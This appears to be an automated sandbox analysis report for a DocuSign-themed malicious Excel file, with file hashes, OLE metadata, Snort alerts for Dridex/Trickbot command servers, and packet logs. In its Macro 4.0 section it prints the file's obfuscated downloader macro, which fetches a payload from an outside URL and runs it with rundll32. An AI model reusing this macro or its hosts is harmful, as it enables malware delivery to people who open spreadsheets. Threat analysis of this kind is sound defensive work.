SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660456700199465 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXs:YEGSzx0dmxk7RbsYsKtseoXc |
MD5: | 0395050B4CB895A16AD84F8E70C521ED |
SHA1: | 4B7903E8FF8F55C8A2B2C677A715411F2AA1558B |
SHA-256: | F9A0EA7DBEC7B9BEBA16AEB7412DF72087B2736159C3B2F314A8978B5DC42504 |
SHA-512: | C34CCB734CD14F5C286A2B071822392274BD282E8AF45A3388CBBA60CD4D54FC2B8D9544ADB8F6088116DDF3197E3204A6255CD1E7959023CA9E84FB2DD10D8B |
Malicious: | false |
Preview: | |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Preview: | |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 152788 |
Entropy (8bit): | 6.316654432555028 |
Encrypted: | false |
SSDEEP: | 1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx |
MD5: | 64FEDADE4387A8B92C120B21EC61E394 |
SHA1: | 15A2673209A41CCA2BC3ADE90537FE676010A962 |
SHA-256: | BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745 |
SHA-512: | 655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875 |
Malicious: | false |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.4909932927770635 |
Encrypted: | false |
SSDEEP: | 12:85QPLgXg/XAlCPCHaXtB8XzB/EZX+WnicvbxbDtZ3YilMMEpxRljK2yTdJP9TdJ2:85g/XTd6jcYexDv3qorNru/ |
MD5: | 8DF148F3815C0B837F9F65372D9F60DE |
SHA1: | FE0773621E78C194705ED2D750D6C61E38798B52 |
SHA-256: | CAF7FD7A666F328EA44EDEE05FFD72EBF1630D20D0A7F16C55368C6435FA6318 |
SHA-512: | B7EB5B5AFBABB509274B1C316A86C9E6BF98C32578E14E9DE822EA6F95F3EA83FCA53723D7573E626EE14D338C280E7ED06B6CD416A207719864B1DF9FEDFC80 |
Malicious: | false |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2178 |
Entropy (8bit): | 4.51897634649714 |
Encrypted: | false |
SSDEEP: | 48:88/XT0jFQ0UsRrjseoQh28/XT0jFQ0UsRrjseoQ/:88/XojFPVaeoQh28/XojFPVaeoQ/ |
MD5: | 40AE1E67959F6C25580AC86D5CEBC988 |
SHA1: | F9322AE7CC8ED6A5AE3414395825A06D5EC5E7CB |
SHA-256: | 66CFB660637CE724FF36FD6B4A9990FDA673850A66675A0CD2E1CBFD3F93E20E |
SHA-512: | A24A8EF12A9CB3A9FC84D8924B0617C52BE92639E66145DB750CA558AC69A4DEB7AE2FCD8844D43A1FC5FDE6896CBED5738D79CD718BD96AB2EA36E3EA662F46 |
Malicious: | false |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 128 |
Entropy (8bit): | 4.778615550495196 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM31Sc4WlGLp5ou61Sc4WlGLp5omM31Sc4WlGLp5ov:dj6B48GLjq48GLj6B48GLjy |
MD5: | 0D88D7CE0967F3A218BE93F1D36468E5 |
SHA1: | 7EF372347F3AB3BC9B3E654514D8135AC439969D |
SHA-256: | 6E9FB0FFDE32626B85529A6208E8D92DE1689E21FA3C1C9DDDE6583CB0DD672A |
SHA-512: | BABE7C0A314E6E1517C21E375B26702EEA555C815079A2425D07658FAF77D8661B7C1CF5FBAB4BF46DEDC31640A6F9F7900638C377EF196C549A66CD7B063136 |
Malicious: | false |
Preview: | |
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | modified |
Size (bytes): | 44097 |
Entropy (8bit): | 4.619647921372402 |
Encrypted: | false |
SSDEEP: | 768:4M8HPEPkfGb84St9cpE4MFjZkD7+M0dzB/:4XEPkg8wpQFj2xOx |
MD5: | F6234413A6939052C8D6016F51F91FDD |
SHA1: | 2B6E05F008F3731645591FF7D8CC498C235D8F42 |
SHA-256: | 1B53D60162FDC0F76D3F0383D260B7E99F44A57B3701A43201C5F431B46767D7 |
SHA-512: | 6886658E215ABCFA2759050B37E659F9B560B977A201C93A5AD569937186CFAFB6AAC962E2C96B66E47D3E636416FF126A04794B2E7E0202D50FA9D28F973F87 |
Malicious: | false |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: | |
Joe Sandbox View: | |
Preview: | |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.23997439179864 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2Qn6:4cKoSsxzNDZLDZjlbR868O8KL5L+4iKm |
MD5: | D1687A16F98FF1BB03332A1B51A7D562 |
SHA1: | BC5ED54E93854F8DD1C53A223933E618C3F2FD3D |
SHA-256: | E1EC0D28B845F902FC5B3FCE22354EA72C993D9FF36ED6DF72C8B7782A0336F4 |
SHA-512: | C4444D5C63EE2FD6B6082B6C416FCE44E0A177C09A205CF67CC92C1145363FC9C141A1840B2EC94DBB58E8037949AB7D53667148F0BD988432B7EB3D7E3A6190 |
Malicious: | false |
Preview: | |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195172018000313 |
TrID: | |
File name: | Sign-1870635479_637332644.xls |
File size: | 168960 |
MD5: | ecd29fe79bd4e7f1bae3ccd26f44397c |
SHA1: | a4e2f0650ac7b4642d43e0c0fbae293ce77a7a40 |
SHA256: | 77500283a6b0da3b616525a210b9fb82ab4dfde174a48ce4bad593c722a6cbb4 |
SHA512: | 49050a99a9803e8e525f18de609457dbb7146d2d5f8ff559c40545eb72f6f57a5046f56da0d984f709cdfd17f999f99b672017d8aab57d39439592d53dbd9a47 |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUMd:OcKoSsxzNDZLDZjlbR868O8KlVH3jiK0 |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "Sign-1870635479_637332644.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.351244264199 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.253278926706 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
Data Raw: | 09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,"=RIGHT(""353454543rtertetr,DllRegister"",12)&V19",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""KJHDFHURNVUTRSHYSTNLUURTHNBDZZLRDNYZru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,,,,,=HALT(),,,
"=FORMULA.FILL(A144,DocuSign!V19)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""YJDYJGYDJNUDTUXTNXYXNuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""JDHNLTVJRBNZXKHTFHNMXTFUXTownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCC""&A146,""YUTVUBSRNYTMYM"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=YUTVUBSRNYTMYM(0,T137&D144&E144&E145&E146&E147,D141,0,0)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""hLKUYFBGVESLTNZBRHYMHYRZndll32"",6)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""XCVBDSTYFGYSDUZGKLRDHZTDJ..\BASE.BABAA"",13)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,Server,,,www.chipmania.it/mails/open,.,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,BB,,,,h,,,,,,,,,,,,,,,,,,,p,,,,,,,,,,,,,,,
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
02/20/21-09:48:19.250919 | TCP | 2404332 | ET CNC Feodo Tracker Reported CnC Server TCP group 17 | 49166 | 443 | 192.168.2.22 | 45.155.173.242 |
02/20/21-09:49:05.777178 | TCP | 2404320 | ET CNC Feodo Tracker Reported CnC Server TCP group 11 | 49170 | 443 | 192.168.2.22 | 193.8.194.96 |
02/20/21-09:49:06.177721 | TCP | 2021013 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 443 | 49170 | 193.8.194.96 | 192.168.2.22 |
02/20/21-09:49:16.239937 | TCP | 2021013 | ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC) | 443 | 49173 | 193.8.194.96 | 192.168.2.22 |
02/20/21-09:49:17.240764 | TCP | 2404336 | ET CNC Feodo Tracker Reported CnC Server TCP group 19 | 49174 | 447 | 192.168.2.22 | 5.202.150.151 |
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 09:48:08.051196098 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.113799095 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.113904953 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.114717007 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.174257040 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181039095 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181072950 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181091070 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181107044 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181123972 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181132078 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181143045 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181160927 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181168079 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181173086 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181179047 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181195974 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181200027 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181216002 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.181220055 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181241035 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.181257010 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.187596083 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.239954948 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.239994049 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240011930 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240034103 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240039110 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240051985 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240066051 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240071058 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240072012 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240073919 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240082026 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240088940 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240108967 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240113020 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240119934 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240128994 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240137100 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240151882 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240170956 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240174055 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240181923 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240194082 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240211010 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240211010 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240226030 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240231991 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240245104 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240267992 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240288019 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240308046 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240328074 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240329981 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240349054 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240365028 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240374088 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240394115 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240411997 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240423918 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.240423918 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.240459919 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.241363049 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297489882 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297517061 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297533035 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297550917 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297584057 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297601938 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297617912 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297619104 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297642946 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297646999 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297648907 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297650099 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297665119 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297667980 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297686100 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297698021 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297703028 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297710896 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297724009 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297736883 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297749996 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297761917 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297826052 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297847986 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297864914 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297874928 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297883034 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297889948 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297909975 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297925949 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.297952890 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297979116 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.297997952 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.298006058 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
Feb 20, 2021 09:48:08.298028946 CET | 49165 | 80 | 192.168.2.22 | 185.81.0.78 |
Feb 20, 2021 09:48:08.298029900 CET | 80 | 49165 | 185.81.0.78 | 192.168.2.22 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 20, 2021 09:48:07.978209019 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:48:08.037940979 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:48:19.789324045 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:48:19.843091011 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:48:19.858103991 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:48:19.906888008 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:07.491444111 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:07.551477909 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:07.557696104 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:07.618220091 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:07.935848951 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:07.984754086 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:07.987725019 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:08.039216995 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:11.780280113 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:11.846560955 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:11.849558115 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:11.912435055 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:11.916096926 CET | 52496 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:12.074311018 CET | 53 | 52496 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:12.078605890 CET | 57564 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:12.137561083 CET | 53 | 57564 | 8.8.8.8 | 192.168.2.22 |
Feb 20, 2021 09:49:12.141418934 CET | 63009 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 20, 2021 09:49:12.232424974 CET | 53 | 63009 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
